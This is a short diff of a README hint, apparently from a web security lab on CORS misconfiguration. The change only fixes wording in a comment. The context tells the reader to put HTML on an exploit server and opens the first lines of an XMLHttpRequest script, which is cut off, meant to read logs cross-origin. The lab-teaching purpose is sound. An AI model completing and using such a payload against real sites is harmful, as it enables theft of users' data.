JJast/Cross-Origin-Resource-Sharing/README.md

 <details>
   <summary>Hint</summary>

-    #This code my help you accessing logs
+    #This code my help you access logs
     #In your browser, go to the exploit server and enter the following HTML, replacing $url with your unique lab URL

     <script>
       var req = new XMLHttpRequest();